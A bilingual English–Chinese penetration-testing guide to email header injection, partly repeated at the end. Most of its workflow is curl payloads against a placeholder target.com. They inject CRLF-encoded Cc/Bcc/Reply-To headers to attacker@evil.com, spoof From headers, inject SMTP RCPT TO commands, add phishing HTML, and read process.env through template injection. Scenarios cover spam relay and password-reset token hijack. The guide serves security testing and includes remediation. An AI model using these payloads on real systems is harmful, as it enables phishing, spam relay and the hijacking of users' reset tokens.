Testing for Email Header Injection

电子邮件头注入测试

When to Use

适用场景

When testing contact forms, feedback forms, or "email a friend" functionality
During assessment of password reset email functionality
When testing newsletter subscription or notification email systems
During penetration testing of applications that send emails based on user input
When auditing email-related API endpoints for header injection

测试联系表单、反馈表单或“邮件分享给好友”功能时
评估密码重置邮件功能期间
测试新闻订阅或通知邮件系统时
对基于用户输入发送邮件的应用程序进行渗透测试期间
审计与邮件相关的API端点是否存在头注入漏洞时

Prerequisites

前置条件

Burp Suite for intercepting and modifying HTTP requests
Understanding of SMTP protocol and email header structure
Knowledge of CRLF injection techniques (\r\n sequences)
Test email accounts for receiving injected emails
Access to application features that trigger email sending
SMTP server logs access for monitoring injection attempts

用于拦截和修改HTTP请求的Burp Suite
了解SMTP协议和邮件头结构
掌握CRLF注入技术（\r\n序列）
用于接收注入测试邮件的测试邮箱账户
可访问触发邮件发送的应用功能
可访问SMTP服务器日志以监控注入尝试

Workflow

测试流程

Step 1 — Identify Email Injection Points

步骤1 — 识别邮件注入点

bash

undefined

bash

undefined

Identify form fields that end up in email headers:

识别会被放入邮件头的表单字段：

- "From" name or email address fields

- “发件人”名称或邮箱地址字段

- "To" or "CC" fields in sharing features

- 分享功能中的“收件人”或“抄送”字段

- Subject line inputs

- 主题行输入框

- Reply-To fields

- 回复地址字段

Common endpoints:

常见端点：

POST /contact - Contact forms

POST /contact - 联系表单

POST /share - Share via email features

POST /share - 邮件分享功能

POST /invite - Invitation systems

POST /invite - 邀请系统

POST /api/send-email - Email API endpoints

POST /api/send-email - 邮件API端点

POST /forgot-password - Password reset forms

POST /forgot-password - 密码重置表单

Test basic functionality first

先测试基础功能

curl -X POST http://target.com/contact
-d "name=Test&email=test@test.com&subject=Hello&message=Test message"

undefined

curl -X POST http://target.com/contact
-d "name=Test&email=test@test.com&subject=Hello&message=Test message"

undefined

Step 2 — Test for CRLF Header Injection

步骤2 — 测试CRLF头注入

bash

undefined

bash

undefined

Inject additional email headers via CRLF in the email field

通过邮箱字段中的CRLF注入额外邮件头

curl -X POST http://target.com/contact
-d "name=Test&email=test@test.com%0ACc:attacker@evil.com&message=Test"

Inject BCC header

注入密送（BCC）头

curl -X POST http://target.com/contact
-d "name=Test&email=test@test.com%0ABcc:attacker@evil.com&message=Test"

Inject via the name field

通过名称字段注入

curl -X POST http://target.com/contact
-d "name=Test%0ACc:attacker@evil.com&email=test@test.com&message=Test"

Inject via subject field

通过主题字段注入

curl -X POST http://target.com/contact
-d "name=Test&email=test@test.com&subject=Hello%0ABcc:attacker@evil.com&message=Test"

Try different CRLF encoding variants

尝试不同的CRLF编码变体

%0D%0A (CRLF)

curl -X POST http://target.com/contact
-d "email=test@test.com%0D%0ACc:attacker@evil.com"

%0A (LF only)

%0A (仅LF)

curl -X POST http://target.com/contact
-d "email=test@test.com%0ACc:attacker@evil.com"

%0D (CR only)

%0D (仅CR)

curl -X POST http://target.com/contact
-d "email=test@test.com%0DCc:attacker@evil.com"

Double encoding

双重编码

curl -X POST http://target.com/contact
-d "email=test@test.com%250ACc:attacker@evil.com"

undefined

curl -X POST http://target.com/contact
-d "email=test@test.com%250ACc:attacker@evil.com"

undefined

Step 3 — Inject Custom Email Content

步骤3 — 注入自定义邮件内容

bash

undefined

bash

undefined

Override email body by injecting Content-Type and body

通过注入Content-Type和邮件正文覆盖原有内容

curl -X POST http://target.com/contact
-d "email=test@test.com%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>"

Inject additional MIME parts

注入额外的MIME部分

curl -X POST http://target.com/contact
-d "email=test@test.com%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>"

Override From header for email spoofing

覆盖发件人（From）头以伪造邮件

curl -X POST http://target.com/contact
-d "email=test@test.com%0AFrom:ceo@target.com"

Inject Reply-To for phishing

注入回复地址（Reply-To）用于钓鱼攻击

curl -X POST http://target.com/contact
-d "email=test@test.com%0AReply-To:attacker@evil.com"

undefined

curl -X POST http://target.com/contact
-d "email=test@test.com%0AReply-To:attacker@evil.com"

undefined

Step 4 — Test IMAP/SMTP Injection

步骤4 — 测试IMAP/SMTP注入

bash

undefined

bash

undefined

IMAP command injection via email field

通过邮箱字段注入IMAP命令

curl -X POST http://target.com/webmail/search
-d "query=test%0AEXAMINE INBOX"

SMTP command injection

SMTP命令注入

curl -X POST http://target.com/api/send
-d "to=test@test.com%0ARCPT TO:attacker@evil.com"

SMTP VRFY command injection

SMTP VRFY命令注入

curl -X POST http://target.com/api/verify
-d "email=test@test.com%0AVRFY admin"

Test SMTP relay abuse

测试SMTP中继滥用

curl -X POST http://target.com/contact
-d "email=test@test.com%0ATo:victim1@target.com%0ATo:victim2@target.com%0ATo:victim3@target.com"

undefined

curl -X POST http://target.com/contact
-d "email=test@test.com%0ATo:victim1@target.com%0ATo:victim2@target.com%0ATo:victim3@target.com"

undefined

Step 5 — Test JSON-Based Email APIs

步骤5 — 测试基于JSON的邮件API

bash

undefined

bash

undefined

JSON API header injection

JSON API头注入

curl -X POST http://target.com/api/send-email
-H "Content-Type: application/json"
-d '{"to":"test@test.com\nCc:attacker@evil.com","subject":"Test","body":"Test"}'

Array injection for multiple recipients

数组注入以添加多个收件人

curl -X POST http://target.com/api/send-email
-H "Content-Type: application/json"
-d '{"to":["test@test.com","attacker@evil.com"],"subject":"Test","body":"Test"}'

Template injection in email body

邮件正文模板注入

curl -X POST http://target.com/api/send-email
-H "Content-Type: application/json"
-d '{"to":"test@test.com","subject":"Test","body":"{{constructor.constructor("return process.env")()}}"}'

undefined

curl -X POST http://target.com/api/send-email
-H "Content-Type: application/json"
-d '{"to":"test@test.com","subject":"Test","body":"{{constructor.constructor("return process.env")()}}"}'

undefined

Step 6 — Validate Findings

步骤6 — 验证测试结果

bash

undefined

bash

undefined

Check if injected CC/BCC emails were received

检查注入的抄送/密送邮件是否被接收

Monitor attacker@evil.com inbox for received copies

监控attacker@evil.com邮箱是否收到副本

Verify header injection via email raw source

通过邮件原始源验证头注入

In received email, check "View Original" or "Show Headers"

在收到的邮件中，查看“查看原始内容”或“显示邮件头”

Look for injected Cc:, Bcc:, From:, or Reply-To: headers

查找注入的Cc:、Bcc:、From:或Reply-To:头

Test if the application is usable as a spam relay

测试应用是否可被用作垃圾邮件中继

by injecting multiple recipients in BCC

通过在密送中注入多个收件人

Document the full injection chain

记录完整的注入链

1. Injection point (which field)

1. 注入点（哪个字段）

2. Encoding required (CRLF, URL encoding)

2. 所需编码（CRLF、URL编码）

3. Impact (spam relay, phishing, data theft)

3. 影响（垃圾邮件中继、钓鱼攻击、数据窃取）

undefined

undefined

Key Concepts

核心概念

Concept	Description
CRLF Injection	Injecting carriage return and line feed characters to create new email headers
Header Injection	Adding unauthorized headers (Cc, Bcc, From) to outgoing emails
Spam Relay	Abusing email functionality to send spam to arbitrary recipients
Email Spoofing	Modifying From or Reply-To headers to impersonate trusted senders
MIME Manipulation	Injecting MIME boundaries to override email body content
SMTP Command Injection	Injecting raw SMTP commands through unsanitized email parameters
Newline Characters	\r\n (CRLF), \n (LF), \r (CR) used to separate email headers

概念	描述
CRLF注入	注入回车和换行符以创建新的邮件头
头注入	向外发邮件添加未授权的头信息（Cc、Bcc、From）
垃圾邮件中继	滥用邮件功能向任意收件人发送垃圾邮件
邮件伪造	修改From或Reply-To头以冒充可信发件人
MIME操纵	注入MIME边界以覆盖邮件正文内容
SMTP命令注入	通过未净化的邮件参数注入原始SMTP命令
换行符	\r\n（CRLF）、\n（LF）、\r（CR），用于分隔邮件头

Tools & Systems

工具与系统

Tool	Purpose
Burp Suite	HTTP proxy for modifying email-related form submissions
swaks	Swiss Army Knife for SMTP testing and header injection validation
OWASP ZAP	Automated scanner with email injection detection
mailhog	Local SMTP testing server for capturing injected emails
smtp4dev	Development SMTP server for monitoring email injection results
Nuclei	Template scanner with email header injection detection templates

工具	用途
Burp Suite	HTTP代理，用于修改与邮件相关的表单提交
swaks	SMTP测试和头注入验证的“瑞士军刀”
OWASP ZAP	具备邮件注入检测功能的自动化扫描器
mailhog	用于捕获注入测试邮件的本地SMTP测试服务器
smtp4dev	用于监控邮件注入结果的开发SMTP服务器
Nuclei	带有邮件头注入检测模板的模板扫描器

Common Scenarios

常见场景

Spam Relay — Inject BCC headers to relay mass emails through the target's SMTP server, bypassing spam filters that trust the sender domain
Phishing via Contact Form — Modify From and Reply-To headers to send phishing emails appearing to originate from the target organization
Password Reset Hijack — Inject CC header in password reset flow to receive a copy of reset tokens sent to the victim
Email Content Override — Inject MIME Content-Type headers to replace legitimate email body with malicious phishing content
Internal Email Abuse — Use header injection to send emails to internal addresses not normally accessible through the application

垃圾邮件中继 — 注入BCC头，通过目标SMTP服务器中继大量邮件，绕过信任发件人域名的垃圾邮件过滤器
联系表单钓鱼 — 修改From和Reply-To头，发送看似来自目标组织的钓鱼邮件
密码重置劫持 — 在密码重置流程中注入CC头，获取发送给受害者的重置令牌副本
邮件内容覆盖 — 注入MIME Content-Type头，将合法邮件正文替换为恶意钓鱼内容
内部邮件滥用 — 使用头注入向通常无法通过应用程序访问的内部地址发送邮件

Output Format

输出格式

undefined

undefined

Email Header Injection Report

邮件头注入测试报告

Target: http://target.com/contact
Injection Point: email field in contact form
Encoding Required: URL-encoded LF (%0A)

目标: http://target.com/contact
注入点: 联系表单中的邮箱字段
所需编码: URL编码的LF (%0A)

Findings

测试结果

#	Field	Payload	Result	Severity
1	email	test@test.com%0ACc:evil@evil.com	CC header injected	High
2	email	test@test.com%0ABcc:evil@evil.com	BCC header injected	High
3	name	Test%0AFrom:ceo@target.com	From spoofing	Medium

#	字段	载荷	结果	严重程度
1	email	test@test.com%0ACc:evil@evil.com	成功注入CC头	高
2	email	test@test.com%0ABcc:evil@evil.com	成功注入BCC头	高
3	name	Test%0AFrom:ceo@target.com	成功伪造发件人	中

Remediation

修复建议

Validate email addresses with strict regex rejecting newline characters
Strip \r, \n, and encoded variants from all email-related input
Use parameterized email APIs that separate headers from data
Implement rate limiting on email-sending functionality

undefined

使用严格的正则表达式验证邮箱地址，拒绝换行符
从所有与邮件相关的输入中移除\r、\n及其编码变体
使用将头信息与数据分离的参数化邮件API
对邮件发送功能实施速率限制

undefined

testing-for-email-header-injection

Original

Translation

Testing for Email Header Injection

电子邮件头注入测试

When to Use

适用场景

Prerequisites

前置条件

Workflow

测试流程

Step 1 — Identify Email Injection Points

步骤1 — 识别邮件注入点

Identify form fields that end up in email headers:

识别会被放入邮件头的表单字段：

- "From" name or email address fields

- “发件人”名称或邮箱地址字段

- "To" or "CC" fields in sharing features

- 分享功能中的“收件人”或“抄送”字段

- Subject line inputs

- 主题行输入框

- Reply-To fields

- 回复地址字段

Common endpoints:

常见端点：

POST /contact - Contact forms

POST /contact - 联系表单

POST /share - Share via email features

POST /share - 邮件分享功能

POST /invite - Invitation systems

POST /invite - 邀请系统

POST /api/send-email - Email API endpoints

POST /api/send-email - 邮件API端点

POST /forgot-password - Password reset forms

POST /forgot-password - 密码重置表单

Test basic functionality first

先测试基础功能

Step 2 — Test for CRLF Header Injection

步骤2 — 测试CRLF头注入

Inject additional email headers via CRLF in the email field

通过邮箱字段中的CRLF注入额外邮件头

Inject BCC header

注入密送（BCC）头

Inject via the name field

通过名称字段注入

Inject via subject field

通过主题字段注入

Try different CRLF encoding variants

尝试不同的CRLF编码变体

%0D%0A (CRLF)

%0D%0A (CRLF)

%0A (LF only)

%0A (仅LF)

%0D (CR only)

%0D (仅CR)

Double encoding

双重编码

Step 3 — Inject Custom Email Content

步骤3 — 注入自定义邮件内容

Override email body by injecting Content-Type and body

通过注入Content-Type和邮件正文覆盖原有内容

Inject additional MIME parts

注入额外的MIME部分

Override From header for email spoofing

覆盖发件人（From）头以伪造邮件

Inject Reply-To for phishing

注入回复地址（Reply-To）用于钓鱼攻击

Step 4 — Test IMAP/SMTP Injection

步骤4 — 测试IMAP/SMTP注入

IMAP command injection via email field

通过邮箱字段注入IMAP命令

SMTP command injection

SMTP命令注入

SMTP VRFY command injection

SMTP VRFY命令注入

Test SMTP relay abuse

测试SMTP中继滥用

Step 5 — Test JSON-Based Email APIs

步骤5 — 测试基于JSON的邮件API

JSON API header injection